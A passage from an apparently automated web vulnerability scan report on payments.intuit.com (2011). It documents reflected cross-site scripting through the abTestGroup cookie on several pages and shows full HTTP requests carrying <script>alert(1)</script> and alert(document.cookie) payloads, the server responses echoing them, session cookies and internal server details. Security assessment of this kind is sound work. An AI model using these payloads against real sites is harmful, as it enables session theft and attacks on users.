Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16f2d55<script>alert(1)</script>c704fa6a9ea;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rEDN5E1j6+Ozz1G2T5PZlw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C09510A0805192AA117E3D6AC554C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92658


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16f2d55<script>alert(1)</script>c704fa6a9ea<br />
...[SNIP]...

1.77. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d080e<script>alert(1)</script>76d20f74ae3 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d080e<script>alert(1)</script>76d20f74ae3;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:07 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-gNeCUsgqZfnpruGmn+O1A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:08 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95DCFDA0A0805192AA117E330CD5480
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101826


...[SNIP]...
<br />
       A/B Test Group: T16d080e<script>alert(1)</script>76d20f74ae3<br />
...[SNIP]...

1.78. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a8df"><script>alert(1)</script>8a97599db5e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163a8df"><script>alert(1)</script>8a97599db5e;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:12 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=CmnUcCtMpotVORb26tb9nw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:13 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C100A0A0805192AA117E3F608AB1B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101839


...[SNIP]...
<input id="testGroup" value="T163a8df"><script>alert(1)</script>8a97599db5e" type="hidden" />
...[SNIP]...

1.79. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe34"><script>alert(1)</script>e4428afd0e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbe34"><script>alert(1)</script>e4428afd0e2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=S54bRjiQv+uVCD7gvAdU-w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E93040A0805192AA117E381BE9E8D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134948


...[SNIP]...
<input id="testGroup" value="T16dbe34"><script>alert(1)</script>e4428afd0e2" type="hidden" />
...[SNIP]...

1.80. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e5954<script>alert(1)</script>7c1b1f23a20 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e5954<script>alert(1)</script>7c1b1f23a20;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:51 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JTutGo4CW82kebKHmtahlQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:52 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96051670A0805192AA117E3B23F6A90
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134934


...[SNIP]...
<br />
       A/B Test Group: T16e5954<script>alert(1)</script>7c1b1f23a20<br />
...[SNIP]...

1.81. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 40826<script>alert(1)</script>6b3b3bfead2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1640826<script>alert(1)</script>6b3b3bfead2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JAU5jTsV01UQdVnkqg89xA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AE16F0A0805192AA117E34608F640
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92658


...[SNIP]...
<br />
       A/B Test Group: T1640826<script>alert(1)</script>6b3b3bfead2<br />
...[SNIP]...

1.82. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f63b"><script>alert(1)</script>2bccb2fa261 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161f63b"><script>alert(1)</script>2bccb2fa261;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:57:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=u7kvfkfqvaVK6w+qzqFzsg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:34:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95981070A0805192AA117E3490D5636
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92673


...[SNIP]...
<input id="testGroup" value="T161f63b"><script>alert(1)</script>2bccb2fa261" type="hidden" />
...[SNIP]...

1.83. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ae697<script>alert(1)</script>aec6008fd49 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 